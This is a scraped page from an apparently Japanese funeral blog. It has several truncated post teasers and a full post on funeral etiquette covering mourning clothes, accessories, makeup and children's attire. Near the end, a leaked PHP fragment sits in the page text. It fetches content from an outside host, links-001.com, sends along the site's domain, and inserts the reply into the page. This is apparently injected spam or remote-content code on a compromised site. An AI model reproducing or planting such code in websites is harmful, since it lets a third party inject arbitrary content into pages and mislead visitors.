前へ
次へ

葬儀会社の方に助けられたことについて

父が病気で亡くなった時には急だったこともあり葬式のことで悩んでいたのですが、近くにある葬儀会社に連絡

more

初めて参列した時は不安になってしまった

お葬式に初めて出席した時、マナーが全く分からなかったのでとても不安でした。
まだ小学校低学年だ

more

お葬式の暗いイメージを変えていく近代

お葬式と聞けば、悲しくて暗いイメージがありますよね。
大事な人が亡くなってしまうのはとても辛い

more

亡くなった人を見送る厳粛なものです

親しい人とのお別れは、突然やってきます。
その時に、親しい人が集まってお別れをするのがお葬式です。
生きている間にお礼を言えたらいいのですが、突然なので言えないことも多くそのお礼や感謝を伝える場でもあります。
お葬式の服装としては、基本的には喪服ですが突然かけつける場合は女性の場合は、黒っぽい服装か地味目なグレーや紺色のスーツかワンピースやスーツが無難のようです。
ストッキングも黒や肌色がいいようです。
男性は、ダーク系のスーツにネクタイは黒または地味目な色がいいようです。
アクセサリーは、ゴールドのブレスレットやゴールドの時計やブレスレットなど、結婚指輪以外のアクセサリーは外すのが望ましいでしょう。
女性のメイクも濃い目のメイクは控えてネイルなどは、カラフルなものを避けます。
香水などにおいのきついものは、控えます。
また、殺生をイメージする毛皮のコートやカバンや靴などを避けます。
子供の場合は、制服のある場合は制服を小さい子供は、赤などの服など意外でしたら地味な黒以外にも白やブルーでもいいです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top